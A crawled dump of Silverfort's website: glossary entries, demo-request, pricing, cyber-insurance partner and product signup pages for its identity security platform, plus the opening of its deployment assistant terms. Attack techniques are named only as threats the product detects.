- [Identity Zero Trust](https://www.silverfort.com/glossary/identity-zero-trust/): A security model where no identity—whether of users, devices, or apps—is inherently trusted; instead, every access request is individually verified... - [Service Account](https://www.silverfort.com/glossary/service-account/): A non-human identity used by applications, services, or automated processes to interact with systems—often needing stringent security oversight. - [MFA Prompt Bombing](https://www.silverfort.com/glossary/mfa-prompt-bombing/): A targeted attack in which adversaries flood users with authentication requests to wear them down into approving false login attempts. - [Lateral Movement](https://www.silverfort.com/glossary/lateral-movement/): A tactic used by threat actors to stealthily navigate across compromised systems within a network, escalating privileges and reaching high-value... - [Identity and Access Management (IAM)](https://www.silverfort.com/glossary/identity-and-access-management-iam/): A framework of policies, processes, and technologies for creating, managing, authenticating, and authorizing digital identities to ensure that the right... - [Identity Protection](https://www.silverfort.com/glossary/identity-protection/): Measures and proactive monitoring aimed at safeguarding individuals’ personal data and accounts from theft, fraud, or unauthorized use. - [PsExec](https://www.silverfort.com/glossary/psexec/): A Windows command-line tool used for executing processes on remote systems, commonly leveraged by attackers for lateral movement and remote... 

---

# Detailed Content

## Pages

- Published: 2025-08-15 - Modified: 2025-08-15 - URL: https://www.silverfort.com/request-a-demo-v3/ Secure every identity. Stop identity threats—inline. We found a way. From legacy to cloud, discover and protect every identity. 
See how Silverfort: finds and protects service accounts & NHIs; helps you securely innovate and adopt AI; contains attackers, reduces IR times & cost; secures your Active Directory. Book your demo

"We did a demo and POC—and our jaws dropped. We were left wondering where this has been all our lives. We knew we absolutely needed Silverfort to fit our identity security needs." Janusz Wreba-Jaworski, Cyber Security Manager | Womble Bond Dickinson

"Silverfort was able to protect what no one else can. There were no solutions that we looked at that were as comprehensive. Of the security tools that we use, Silverfort has a very high return on investment." Tom Parker, VP of IT & CISO | Kayak

"Silverfort’s innovative solution simplifies this process without system modifications, saving time and money." William Woo, Group CIO | Singtel

Rated 4.8 on Gartner Peer Insights. Book a 30-minute demo. See Silverfort in action.

Recognized by the industry: Fast Company's Most Innovative Companies 2025; Fortune Top 50 Cybersecurity Companies 2025; 2024 Microsoft Partner of the Year.

Why choose the Silverfort Identity Security Platform: 10B authentications analyzed and protected every day. 34K real identity exposures & threats detected on average per customer. 17x faster deployment compared to traditional solutions on average. Convinced yet? Let's chat. Book your 30-minute demo

--- - Published: 2025-08-14 - Modified: 2025-08-18 - URL: https://www.silverfort.com/cyber-insurance-partner-ecosystem/cyber-insurance-partner-ecosystem-wtw/ Silverfort's Cyber Insurance Ecosystem WTW | Willis Willis, a WTW business, is a global leader in advisory, broking and solutions. Our comprehensive cyber risk approach assesses exposures, quantifies potential losses and optimizes risk transfer strategies to help clients protect and grow their businesses effectively. How Silverfort and Willis work together Willis proudly partners with Silverfort to deliver market-leading risk services and cost-effective solutions. Together, we help organizations strengthen their defenses and mitigate threats before incidents occur, ensuring resilience and peace of mind in a rapidly evolving threat landscape. 
Contact us to get started Exclusively for WTW clients Get a free identity security assessment with Silverfort Silverfort’s free identity security assessment can help WTW clients discover and resolve gaps in their MFA and privileged access protection and help to discover and secure service accounts. Get started Learn more about cyber insurance compliance with Silverfort

--- - Published: 2025-08-08 - Modified: 2025-08-15 - URL: https://www.silverfort.com/request-a-demo-v2/ Book a 30-minute demo Protect every identity. Stop identity threats—inline. We found a way. See how Silverfort discovers every identity, finds & fixes weaknesses, and preemptively enforces protection at runtime—with rapid deployment and no modifications to existing systems. Book your demo

"We did a demo and POC—and our jaws dropped. We were left wondering where this has been all our lives. We knew we absolutely needed Silverfort to fit our identity security needs." Janusz Wreba-Jaworski, Cyber Security Manager | Womble Bond Dickinson

"Silverfort was able to protect what no one else can. There were no solutions that we looked at that were as comprehensive. Of the security tools that we use, Silverfort has a very high return on investment." Tom Parker, VP of IT & CISO | Kayak

"Silverfort’s innovative solution simplifies this process without system modifications, saving time and money." William Woo, Group CIO | Singtel

Rated 4.8 on Gartner Peer Insights. See Silverfort in action.

Recognized by the industry: Fast Company's Most Innovative Companies 2025; Fortune Top 50 Cybersecurity Companies 2025; 2024 Microsoft Partner of the Year.

Why choose the Silverfort Identity Security Platform: 10B authentications analyzed and protected every day. 34K real identity exposures & threats detected on average per customer. 17x faster deployment compared to traditional solutions on average. Convinced yet? Let's chat. 
Book your 30-minute demo

--- - Published: 2025-08-07 - Modified: 2025-08-07 - URL: https://www.silverfort.com/cyber-insurance-free-assessment-insurance-partner/ GET A FREE IDENTITY SECURITY ASSESSMENT Identify the MFA and privileged access protection gaps you must resolve to qualify for a cyber insurance policy. Silverfort’s free assessment enables you to identify and address all the identity protection issues in your environment so you can meet your insurer’s requirements: administrative users that require MFA protection; service accounts’ inventory, privileges, and activities; identity protection hygiene issues and exposed attack surfaces; active identity threats that take place in your environment.

--- - Published: 2025-08-05 - Modified: 2025-08-05 - URL: https://www.silverfort.com/cyber-insurance-partner-ecosystem/sompo/ Silverfort's Cyber Insurance Ecosystem Sompo Sompo is a global provider of commercial and consumer property, casualty, and specialty insurance and reinsurance. Building on the 135 years of innovation of our parent company, Sompo Holdings, Inc., Sompo employs approximately 9,500 people around the world who use their expertise to help simplify and resolve your complex challenges. How Silverfort and Sompo work together Sompo insureds qualify for large discounts toward new Silverfort licensing over the duration of the policy term. Primary insureds qualify to have Sompo share the expense of Silverfort licenses, making Sompo a committed partner. Additional terms apply. Contact us to get started Learn more about cyber insurance compliance with Silverfort

--- - Published: 2025-08-05 - Modified: 2025-08-05 - URL: https://www.silverfort.com/cyber-insurance-partner-ecosystem/crum-and-forster/ Silverfort's Cyber Insurance Ecosystem Crum & Forster Crum & Forster (C&F) is a leading national property, casualty, and accident & health insurer, providing specialty insurance products through its admitted and surplus lines insurance companies. 
The company has a 200-year history, dating back to 1822, and is known for its expertise, integrity, and disciplined approach to risk management. How Silverfort and Crum & Forster work together C&F’s partnership with Silverfort allows our policy holders to take advantage of a free Identity Risk Assessment* and special discounts for Silverfort solutions. *Free Identity Risk Assessment is only available for insureds who have 250 identities or more within their environment. Contact us to get started Exclusively for C&F clients Get a free identity security assessment with Silverfort Silverfort’s free identity security assessment can help C&F clients discover and resolve gaps in their MFA and privileged access protection and help to discover and secure service accounts. Get started Learn more about cyber insurance compliance with Silverfort

--- - Published: 2025-08-04 - Modified: 2025-08-21 - URL: https://www.silverfort.com/mtny-3/ The identity security platform Secure every dimension of identity, everywhere. Discover exposures, enforce identity security controls, and stop attacks before they cause damage—all from a single platform. No modifications or lengthy deployments. Just identity security done right. Privileged Access Security | Non-Human Identity Security | Service Account Visibility & Protection | Universal MFA | Identity Threat Detection & Response | Identity Security Posture Management | AI Agent Security. Get a demo or Take a platform tour

--- - Published: 2025-08-04 - Modified: 2025-08-21 - URL: https://www.silverfort.com/mtny3/ The identity security platform Secure every identity. Human, AI, and machine. Cloud and on-prem. Discover what others miss. Control what others can’t. Secure every identity—in real time, from one platform. Fix hidden risks, close unmanaged access paths, and proactively enforce security policies at scale. Silverfort helps you: get visibility into hybrid environments; retrofit your legacy systems with MFA; stop attacks & block lateral movement; discover & protect service accounts & NHIs; protect privileged access at scale; contain an active breach; protect every AD asset; securely innovate & adopt AI. Trusted by 1,000+ organizations around the world. Rated 4.8 on Gartner Peer Insights.

The #1 attack surface: Identity is where your current security tools end and every attack begins. IAM security controls only work within their own silos, leaving critical gaps. Too many systems and resources are left exposed and unprotected, creating countless security blind spots.

Why Silverfort: The Silverfort identity security platform secures your entire IAM infrastructure from within. We found a way to bring identity security to every corner of your environment. Our Runtime Access Protection (RAP) technology integrates seamlessly with your IAM infrastructure to protect all identities, all environments, and all resources—all the time. End-to-end: identity protection for on-prem, cloud, humans and machines. Protect the unprotectable: including systems that no other solution can cover. Zero changes to your systems, minimizing disruptions and cost. Discover the platform or Take a platform tour.

Where’s the gap in your identity defense? Privileged Access Security (PAS): go beyond managing privileged accounts. Non-Human Identity (NHI) Security: discover and protect non-human identities. Universal MFA: extend multi-factor authentication to any system. Authentication Firewall: stop unauthorized access with Zero Trust policies. Identity Threat Detection & Response (ITDR): detect and respond to attacks in real time. Identity Security Posture Management (ISPM): uncover, map and analyze identity security exposures. AI Agent Security: govern, monitor and protect your AI agents.

Proven technology: Trusted by 1,000+ organizations. Identity security is the heart of our mission. We build true partnerships with our customers to take identity security further. The results speak for themselves. Hear from our customers:

"Silverfort is able to protect what no one else can. There were no solutions that we looked at that were as comprehensive. Of the security tools that we use, Silverfort has a very high return on investment." Tom Parker, VP of IT & CISO | Kayak

"We did a demo and POC—and our jaws dropped. We were left wondering where this has been all our lives. We knew we absolutely needed this to fit our identity security needs." Janusz Wreba-Jaworski, Cyber Security Manager | Womble Bond Dickinson

"Many large enterprises find it difficult to implement secure employee authentication across all their environments. Silverfort’s innovative solution simplifies this process without system modifications, saving time and money." William Woo, Group CIO | Singtel

“With the help of Silverfort, we were able to fill a critical gap in our identity security, which was key for our overall security posture.” Katie McMillan, Information Security Manager | Agilisys

Latest blogs: Explore our blog

--- - Published: 2025-08-04 - Modified: 2025-08-21 - URL: https://www.silverfort.com/mtny5/ The identity security platform you deserve Need to comply with security regulations? stop lateral movement? complete your PAM deployment? adopt AI quickly and securely? get cyber insurance? pass an audit? resolve a security incident? find and secure your NHIs? 
We discover and protect every dimension of identity, everywhere—human, AI, or machine, cloud or on-prem—so you can get maximum security with minimal effort. One platform, many outcomes. Get a demo or Take a platform tour. Trusted by 1,000+ organizations around the world. Rated 4.8 on Gartner Peer Insights

--- - Published: 2025-07-30 - Modified: 2025-08-21 - URL: https://www.silverfort.com/pricing-v6/ Silverfort Pricing Our pricing is based on the size of your organization. Choose between four packages depending on where your business is on its identity security journey. All packages include Silverfort’s patented Runtime Access Protection for preemptive security controls and Identity Inventory for end-to-end identity observability across your entire identity fabric. Get a quote today
- Core includes: Identity Security Posture Management (ISPM) (map identity attack surface; find & fix security exposures); Universal MFA (extend MFA to IT/OT infrastructure, command-line tools, legacy systems & more). Get a quote
- Plus: everything in Core, and Service Account Visibility (discover all service accounts; map how & where they are used); Service Account Protection (enforce virtual fencing policies; prevent unauthorized access; integrate with other IT tools to manage lifecycle automatically). Get a quote
- Advanced: everything in Plus, and Authentication Firewall (prevent lateral movement; identity-based segmentation; Zero Trust access control); Identity Threat Detection & Response (ITDR) (detect identity threats in real time; automated inline response; integrate with XDR and SIEM). Get a quote
- Enterprise: everything in Advanced, and Access Analysis (enable Least Privilege at scale; understand which users access which resources); Privileged Access Security (PAS) (privileged account discovery; virtual fencing & access control; Just-In-Time (JIT) access). Get a quote
Compare our packages. Silverfort a la carte: Build your own package. Browse our individual platform capabilities to customize your package. 
Browse our catalog. Compare our pricing packages (Core, Plus, Advanced, Enterprise). The Silverfort Platform and standard support services are included in all packages.
- Identity Security Posture Management (ISPM): Uncover, map and analyze identity security exposures
- Universal Multi-Factor Authentication (MFA): Enable MFA for any resource, including 'unprotectable' systems
- Service Account Visibility: Discover and analyse every service account, even unknowns
- Service Account Protection: Restrict service account access to their intended purpose only
- Authentication Firewall: Boost your resilience with identity-based Zero Trust policies
- Identity Threat Detection & Response (ITDR): Detect and respond to attacks in real time
- Access Analysis: Understand which users access which resources, at scale
- Privileged Access Security (PAS): Secure your privileged accounts—in a few clicks
- Cloud Non-Human Identity (NHI) Security: Find, monitor, and secure every cloud-based NHI
- Implementation & Support Services: Standard included; Premier (adds 10% to license cost); Diamond (adds 20% to license cost)
- Silverfort Expert Services: Identity Security Services (threat hunting & incident response), Silverfort Resident Expert (staff augmentation) and more. Available upon request from Silverfort or selected partners.
Get a personalized quote. Complete this form and a member of our team will be in touch to discuss.

Silverfort Pricing Our pricing is based on the number of users. Customers can choose between three simple packages—see details below. All packages include the Silverfort platform infrastructure, delivered as on-prem VMs or SaaS. To request a quote, schedule a quick call with our team. Get a quote. Silverfort Essential: Reduce your identity attack surface, detect & respond to identity-based attacks in real-time, and gain visibility across all IAM silos. Silverfort Pro: Move beyond visibility into real-time enforcement and active protection. 
Focus on your most sensitive users to address your top security and compliance gaps. Silverfort Unified: Gain end-to-end visibility and real-time enforcement for all identities – human and non-human, privileged and non-privileged – to stop identity threats everywhere. Package comparison (Silverfort Essential, Silverfort Pro, Silverfort Unified):
- Identity Observability: Identity Security Posture Management (ISPM): Uncover, map and analyze identity security exposures; Identity Threat Detection and Response (ITDR): Detect and respond to attacks in real-time
- Identity Protection: Universal MFA: Extend Multi-Factor Authentication to any system, including ones that couldn’t be protected before (10% of company size); Non-Human Identity (NHI) Security: Discover, monitor and protect Non-Human Identities (10% of company size); Authentication Firewall: Stop unauthorized access with Zero Trust policies (10% of company size)
- Privileged Access Security (PAS): Discover privileged accounts and enforce Least Privilege and Just-In-Time (JIT) access. Optional add-on on top of any chosen package. Priced per protected privileged user.
- Implementation & Support Services: Standard included; Premier (adds 10% to license cost); Diamond (adds 20% to license cost)
- Silverfort Expert Services: Identity Security Services (threat hunting & incident response), Silverfort Resident Expert (staff augmentation) and more—available upon request, from Silverfort or selected partners.
Get a personalized quote. Complete this form and a member of our team will be in touch to discuss.

--- - Published: 2025-07-28 - Modified: 2025-08-13 - URL: https://www.silverfort.com/nhi-protection-signup/ Non-Human Identity Security starts here Silverfort delivers end-to-end protection for both human and non-human identities across cloud, on-prem, and hybrid environments. From AD service accounts to cloud-based NHIs like tokens and keys, Silverfort eliminates fragmented tools and silos, providing unified security through a single platform. 
Protect every identity from misuse, compromise, and lateral movement. Automatically discover and analyze all identities in your environment, enforce real-time access controls, and apply “Virtual Fencing” to ensure service accounts can’t be exploited—even if credentials are compromised. Get access

Only Silverfort delivers end-to-end NHI security across on-prem and cloud. Protect both on-prem service accounts and cloud NHIs from a single platform, instead of relying on silos and point solutions. Classify and prioritize: Uncover the different types of NHIs and their behavior to build a protection roadmap that aligns with your needs. Discover every NHI: See all the NHIs in your environments, with granular insights into their activities, risk indicators and usage patterns. Scale NHI security: Seamlessly secure all your NHIs across cloud and on-prem environments. 
Learn more about our platform

--- - Published: 2025-07-28 - Modified: 2025-08-13 - URL: https://www.silverfort.com/nhi-signup/ Secure Your Non-Human Identities with Silverfort Gain complete visibility and control over non-human identities (NHIs) across your on-prem and cloud environments—ensuring every service account, script, and automated process is fully secured. Continuously discover and monitor all NHIs in your hybrid infrastructure to eliminate blind spots and unmanaged access risks. Enforce least privilege access, block lateral movement, and extend security controls to all identities without the operational overhead of password rotation or infrastructure changes. Get access

NHI journey: from visibility to comprehensive security. Discover, monitor, and protect all non-human identities in your hybrid environment at scale, without requiring password rotation. 
Automated discovery Gain visibility into your entire NHI inventory, including name, privilege level, security posture, sources and destinations of every account, so you can effectively prioritize. Real-time protection Activate an auto-generated policy that allows the account to access its standard sources and destinations, and triggers access block or alert when it deviates from its normal behavior. Effortless to scale Group all the accounts you want to protect under a single policy, continue adding accounts until all are protected, and integrate with your app management tool for ease of use. Learn more about our platform --- - Published: 2025-07-28 - Modified: 2025-08-13 - URL: https://www.silverfort.com/mfa-firewall-signup/ One identity security platform. Total access control. Silverfort brings together the power of Universal MFA and Authentication Firewall in one integrated platform to secure all identities and resources. Prevent unauthorized access and enforce adaptive policies—without deploying proxies or agents. From MFA on legacy systems to dynamic access controls based on risk, Silverfort protects your entire identity infrastructure from within. Get access window. hsFormsOnReady = window. hsFormsOnReady || ; window. hsFormsOnReady. push(function { hbspt. forms. create({ portalId: "4711332", formId: "29701f93-a936-41f4-ae94-0a08a79134fd", target: "#hbspt-form-29701f93-a936-41f4-ae94-0a08a79134fd", region: "na1" }); }); // Function to display a "Thank you" message after form submission function displayThankYouMessage { setTimeout(function { // Create a thank you message element var thankYouMessage = document. createElement("p"); thankYouMessage. textContent = "Thank you for connecting with us! Redirecting... "; thankYouMessage. style. color = "green"; thankYouMessage. style. fontSize = "18px"; thankYouMessage. style. marginTop = "20px"; // Append the message to the form container var formContainer = document. 
querySelector("#hbspt-form-29701f93-a936-41f4-ae94-0a08a79134fd"); if (formContainer) { formContainer. appendChild(thankYouMessage); } }, 2000); // 2-second delay } One platform. Every identity. Full coverage. Protect every identity across every protocol and environment. Unified protection Enforce MFA and access control everywhere with a single platform and policy engine. Real-time enforcement with zero disruption Apply risk-based policies to every authentication attempt without the need to modify or change your environment. End-to-end coverage across legacy and cloud Extend identity protection to the systems that traditional solutions can’t reach. Learn more about our platform --- - Published: 2025-07-28 - Modified: 2025-08-13 - URL: https://www.silverfort.com/mfa-signup/ Enforce MFA without the limits Silverfort's Universal MFA secures every resource, whether it's on-prem, legacy or cloud. No need to change your infrastructure or user workflows. It extends protection to all AD authentication protocols, including Kerberos, NTLM, and LDAP. Use Silverfort as your only MFA provider or extend it to cover the blind spots by your current MFA solutions to protect all your workforce with a consistent user experience across all resource access. Get access window. hsFormsOnReady = window. hsFormsOnReady || ; window. hsFormsOnReady. push(function { hbspt. forms. create({ portalId: "4711332", formId: "c59bdd86-9361-40ce-a9e0-1ff492459199", target: "#hbspt-form-c59bdd86-9361-40ce-a9e0-1ff492459199", region: "na1" }); }); // Function to display a "Thank you" message after form submission function displayThankYouMessage { setTimeout(function { // Create a thank you message element var thankYouMessage = document. createElement("p"); thankYouMessage. textContent = "Thank you for connecting with us! Redirecting... "; thankYouMessage. style. color = "green"; thankYouMessage. style. fontSize = "18px"; thankYouMessage. style. 
Your MFA, anywhere it's needed

Secure your identity layer and extend MFA to any system, interface or protocol without proxies or agents.

- Universal MFA for AD & legacy apps: Protect all your critical resources, including file shares, command-line interfaces, and admin tools, without any modifications required.
- Plug-and-play with your current MFA: Extend the MFA solution you already use across your hybrid infrastructure without disrupting the user experience.
- Risk-based enforcement: Combine static policies with contextual risk insights to trigger MFA only when it matters most.

---

- Published: 2025-07-28
- Modified: 2025-08-13
- URL: https://www.silverfort.com/firewall-signup/

Put identity at the center of access control

Silverfort’s Authentication Firewall enforces granular, identity-based access policies across your hybrid AD environment. Segment access, reduce lateral movement risk, and eliminate legacy authentication blind spots. IAM and security teams can implement or revoke access in real time, without re-architecting their environment or compromising agility.
Real-time identity segmentation.

Define access policies based on identity, protocol, and behavior. Activate protection in one click.

- Least privilege enforcement: Apply access policies based on identity and resource attributes, reducing excessive privileges and insider risk.
- Block threats at first touch: Halt lateral movement and deny risky authentication attempts as soon as they're detected.
- Legacy protocol control: Disable risky protocols like NTLMv1 and cleartext LDAP without disrupting operations or access.

---

- Published: 2025-07-28
- Modified: 2025-08-13
- URL: https://www.silverfort.com/cloud-platform-signup/

Your cloud identity security journey starts here

Gain visibility and control over every authentication and identity across cloud infrastructure, SaaS apps, and hybrid environments from a single platform. Automatically discover all human and non-human identities (NHIs), including service accounts, access keys, federated users, unmanaged admins, and stale entitlements. Detect risky access behaviors and stop lateral movement, privilege misuse, and identity-based attacks before they happen.
Only Silverfort provides unified identity protection for cloud and on-prem—from legacy to modern, and human to NHI.

Enforce real-time access policies across every identity and resource without modifying your cloud environments or apps, or writing custom integrations.

- Unify identity visibility and control: Discover all identities across cloud and hybrid, including blind spots like service accounts, SSH access, and outdated protocols.
- Enforce conditional access for every authentication: Apply context-aware MFA and access policies to resources that were previously unprotected — including CLI tools, legacy apps, and databases.
- Stop identity-based threats in real time: Detect and block suspicious authentications, compromised credentials, and abnormal access paths before they escalate.

---

- Published: 2025-07-28
- Modified: 2025-08-13
- URL: https://www.silverfort.com/access-analysis-signup/

Reveal and remediate excessive access at scale

Gain end-to-end visibility into how every identity, human or non-human, accesses resources across your hybrid environment. Map real-time identity-to-application access paths, identify unused or risky entitlements, and uncover hidden exposures that traditional tools fail to detect. With a clear view into actual access behavior, move beyond static permission reviews: prioritize high-risk access, eliminate excessive privileges, and trigger protection or cleanup actions immediately from a single platform.
- Real-time access path mapping: Define the full picture of access—not just what’s assigned, but what’s actually used.
- Understand effective privileges: Identify which identities are actually using access—how often, to what resources, and under what conditions.
- Visibility into real usage and hidden risk: Focus your efforts where they matter most by revealing actual authentication activity, privilege usage, and protocol-level exposures.
- Turn insight into immediate risk reduction: Take decisive action on exposed access paths by enforcing MFA, restricting risky authentications, or deactivating unused accounts.

---

- Published: 2025-07-28
- Modified: 2025-08-13
- URL: https://www.silverfort.com/cloud-access-analysis-signup/

See and secure every cloud access path

Modern cloud environments are complex, dynamic, and often invisible to security and IAM teams. Traditional tools focus on static assignments, missing how access is actually granted, inherited, and used. This creates blind spots that attackers exploit.
Silverfort’s Cloud Access Analysis delivers real-time visibility into effective access across AWS, Azure, and GCP. It maps how users reach cloud resources, identifies unprotected or unused access, and helps teams clean up entitlements or enforce controls like MFA.

Map cloud access. Reduce risk. Enforce with precision.

Continuously analyze identity-to-resource paths across cloud environments and take action on what matters most.

- Access Path Mapping Across AWS, Azure, and GCP: Visualize how users access cloud resources, including group memberships, role assumptions, and privilege inheritance.
- Effective Privilege Analysis: See what users can do, not just what they’re assigned. Prioritize risk by identifying overly broad or unused access.
- Misconfiguration & Risk Detection: Quickly detect dormant privileges, long-lived roles, or missing protections before they become entry points.
---

- Published: 2025-07-28
- Modified: 2025-08-13
- URL: https://www.silverfort.com/ai-agents-security-signup/

Unlock AI agent potential, securely

Silverfort’s AI Agent Security solution brings human-level visibility to agentic activity. It discovers AI agents operating across your cloud environment, tracks who they belong to, and logs exactly what they do, so your team can audit confidently, detect misconfigurations, and stay in control.

Discover and track agentic activity across your organization

Continuously identify, attribute, and monitor AI agents across your environment—no developer effort required.

- Automated cloud agent discovery: Automatically discover AI agents across AWS, Entra ID, and Google Workspace - no code changes or manual tagging required.
- Ownership & activity attribution: Map each agent to the human or system that created or invoked it. Track usage patterns and behavioral context to understand how agents operate.
- Detect risky or misconfigured AI agents: Identify agents with unusual behaviors, such as excessive privileges, long-lived activity, or unclear ownership. Flag them for review.

---

- Published: 2025-07-23
- Modified: 2025-08-01
- URL: https://www.silverfort.com/pricing/catalog/

Browse our catalog

The Silverfort Identity Security Platform forms the basis for all of our packages and includes telemetry, basic reporting, all integrations, and our standard support services. Any capability listed below can be added to the base platform or to one of our existing packages.

- Core: Identity Security Posture Management (ISPM). Find and fix exposures to reduce your identity attack surface. You can't protect what you can't see. Improve your resilience with continuous discovery and mitigation of identity exposures like vulnerable protocols, stale accounts & shadow admins.
- Core: Universal Multi-Factor Authentication (MFA). Enable MFA for any resource, including 'unprotectable' systems. Solve security and compliance gaps by enabling MFA anywhere. We integrate with Active Directory to extend MFA even to legacy apps, command-line interfaces and OT systems—without modifications.
- Plus: Service Account Visibility & Protection. Discover, analyze and protect all your service accounts. Map and secure every service account in your environment, including unknowns. Drill down into their privilege levels, sources and destinations, discover dependencies, and protect at scale with auto-generated policies.
- Advanced: Identity Threat Detection and Response (ITDR). Detect and respond to identity threats anywhere, faster. Rapidly detect account takeover, lateral movement, ransomware propagation and more. Leverage unique inline response capabilities to stop threats before they can spread.
- Advanced: Authentication Firewall. Boost your resilience with identity-based Zero Trust policies.
  Make unauthorized access and lateral movement impossible with an Authentication Firewall that controls access from behind your Active Directory, stopping attacks before they can spread.
- Enterprise: Access Analysis (Coming soon). Understand which users access which resources, at scale. Map all user access automatically, including sources, destinations and frequency. Use our insights to achieve Least Privilege access, assist in app migration projects, and save money by finding unused apps.
- Enterprise: Privileged Access Security (PAS). Go beyond managing your privileged accounts. Secure them. Discover and protect privileged accounts rapidly. Our patented technology finds privileged accounts automatically, and enables Least Privilege and Just-In-Time (JIT) access policies without friction.
- Add On: AI Agent Security. Secure your AI agents. Innovate with speed and confidence. Securely adopt AI by governing, monitoring, and protecting your AI agents with the same rigor applied to human users. Protect AI from itself, from bad actors, and from insider threats.
- Add On: Cloud Non-Human Identity Security. Find, monitor, and secure every cloud-based NHI. View all your cloud NHIs, prioritize critical exposures, and remediate security and lifecycle gaps. Turn insight into action to strengthen your identity posture and reduce risk.

---

- Published: 2025-07-23
- Modified: 2025-08-13
- URL: https://www.silverfort.com/cloud-ispm-signup/

Start building stronger cloud identity security posture from day one.

Gain control over cloud identity risks with Silverfort's Cloud ISPM. Continuously identify and remediate cloud exposures such as misconfigurations, excessive privileges, and other identity weaknesses across your cloud environment.
You’ll be able to assess and strengthen your identity posture across Cloud IdPs (Entra ID, AWS IAM, Google Workspace), SaaS applications, and cloud infrastructure (Azure, AWS, GCP) — all from a single view. Focus on what matters most by prioritizing fixes based on real risk, streamlining compliance efforts, and reducing identity complexity without sacrificing visibility.

Only Silverfort lets you manage identity threat exposures in one place — across all your cloud IdPs, infrastructure, and SaaS applications

Gain deep visibility into identity exposures including misconfigurations, excessive privileges, risky practices, and other weaknesses that expand your attack surface.

- Know your identity threat exposure: Get a consolidated view of all the weaknesses that expose your environment to credential access and privilege escalation.
- Prioritize the risks that matter most: Focus on the most critical cloud-based identity threats and optimize your exposure management efforts.
- Remediate effectively to reduce risks: Fix weaknesses and exposures you discover with actionable guidance, or enforce MFA and authentication firewall policies.

---

- Published: 2025-07-23
- Modified: 2025-08-13
- URL: https://www.silverfort.com/ispm-signup/

Unify and strengthen identity security posture across every environment

Get a unified view of all identity security exposures across your hybrid environments to clearly understand your priorities based on real risk, and take immediate action. With this visibility and control, you can reduce your identity threat surface across both cloud and on-prem environments — all from a single platform built to accelerate your identity security posture management.

Uncover the gaps and misconfigurations putting your organization at risk

Gain comprehensive visibility into the security gaps, misconfigurations, malpractices, and legacy infrastructure that expose your environment to identity threats.
- IAM hardening: Resolve any detected issues in your AD, cloud IdP, or federation infrastructure by continuously monitoring their resilience to the widest range of identity threats.
- Threat exposure management: Discover all identity threat exposures that allow adversaries to perform credential access, privilege escalation, and lateral movement.
- Unified on-prem & cloud analysis: Gain end-to-end visibility into all identity security exposures across your on-prem and cloud environments.

---

- Published: 2025-07-23
- Modified: 2025-08-13
- URL: https://www.silverfort.com/cloud-itdr-signup/

Detect and respond to identity threats across your cloud stack

Detect and investigate identity-based threats across your entire multi-cloud environment, from cloud IdPs to SaaS apps and infrastructure. Track malicious activity tied to a single identity and understand its full blast radius, even as it moves across systems. Uncover high-risk user behaviors like lateral movement, privilege misuse, and NHI abuse. Take fast and effective action with guided remediation and policy enforcement, while giving SecOps the visibility and context they need to contain threats and reduce risk.
Identity threat detection and response built for the cloud

Know which identities are at risk, how they’re being exploited, and how to contain them — all from a single platform.

- Complete cloud coverage: Detect identity-based threats across your entire cloud stack — including multi-cloud environments, SaaS apps, and cloud infrastructure.
- High precision: Employ multiple risk engines that combine real-time analysis of the authentication with the user’s overall context and security posture to increase accuracy and avoid false positives.
- Active real-time response: Block malicious access attempts to secure your cloud environment from malicious activity, while providing your team with actionable forensic data.

---

- Published: 2025-07-23
- Modified: 2025-08-13
- URL: https://www.silverfort.com/itdr-signup/

Detect and stop identity risks across your entire attack surface

Identify and respond to identity-based threats across both cloud and on-prem environments, including directories, infrastructure, SaaS apps, and identity providers. Quickly detect malicious activity correlated to any identity as it moves across environments, and understand the full scope of exposure. With real-time insight into identity data and authentication activity, you can stop threats like lateral movement, privilege escalation, and NHI misuse before attackers reach critical resources. This helps you respond quickly with policy-based enforcement such as MFA and access blocking, and gives SecOps the context they need to contain threats with speed and precision.
Identity threat detection and response that closes the gaps others miss

See identity threats in real time, understand how they spread, and stop them before any damage is done — all from a single platform.

- Widest range of identity threat coverage: Detect all types of identity threats across the full range of attempted malicious access, from brute force and Kerberoasting to Pass the Ticket and DCSync.
- Real-time prevention: Trigger MFA upon detected malicious access attempts over any remote command-line or screen sharing tool, preventing adversaries from using them for malicious access.
- Streamline investigation: Empower your SecOps team to easily trace the access trail of compromised user accounts back to patient zero by filtering for any account that violated the MFA or block-access policy.

---

- Published: 2025-07-23
- Modified: 2025-08-13
- URL: https://www.silverfort.com/itdr-ispm-signup/

One identity security platform to manage all identity risks and stop identity threats

Reduce your identity attack surface and detect threats before they lead to compromise—all from one platform.
By continuously uncovering misconfigurations, excessive access, and legacy risks across cloud and on-prem systems, you can prioritize what to fix based on real risks. Detect threats in real time, whether it’s lateral movement, privilege escalation, or NHI abuse, and take action fast. Enforce MFA, block access, or guide remediation all on one platform, and empower your SecOps and IAM teams with shared visibility to reduce exposure and accelerate response.

Complete identity posture and threat detection across every identity and system

Reduce your identity attack surface and respond to active threats, all from the same platform with the same identity insights.

- Streamline protection and response: Bridge posture insights and threat signals to take faster, smarter action, from policy enforcement to guided remediation.
- Detect & respond to attacks in real time: Stop lateral movement, privilege escalation, and service account misuse the moment it starts, with detection that follows identities across cloud and on-prem.
- Close gaps before attackers exploit them: Continuously uncover and fix identity exposures — like misconfigurations, excessive privileges, and legacy risks — before they turn into active threats.

---

- Published: 2025-07-23
- Modified: 2025-08-13
- URL: https://www.silverfort.com/service-accounts-signup/

Don’t let service accounts be your blind spot—protect them

Get full visibility into every non-human identity, including their sources, destinations, authentication protocols, and activity levels. Continuously monitor behavior, detect risky deviations in real time, and trigger instant responses—whether alerting or blocking—to stop threats before they spread.

Automatically discover, control and protect all service accounts in your environment.

Discover, monitor and protect service accounts with fully automated visibility, risk analysis and adaptive access policies, without requiring password rotation.
- Analyze all service account activity: Assess authentication risks using contextual data and risk scoring, detect anomalies, and equip SOC teams with actionable insights and logs.
- Proactive threat prevention: Place a virtual perimeter around your service accounts with access policies tailored to each account’s behavior to prevent threat actors from using them in lateral movement attacks.
- Automated discovery & monitoring: Gain automatic and comprehensive visibility into all your service accounts and non-human identities, including the ones you’re not aware of, as well as real-time insights into their activity and risk level.

---

- Published: 2025-07-16
- Modified: 2025-08-21
- URL: https://www.silverfort.com/sdaterms/

The use of the Silverfort Deployment Assistant (hereinafter “SDA”) is governed by the following terms and conditions:

Silverfort hereby grants the end-user (“Licensee”) a non-exclusive, non-sublicensable, non-transferable, revocable license to use the SDA solely in object code format, for internal business security purposes only.
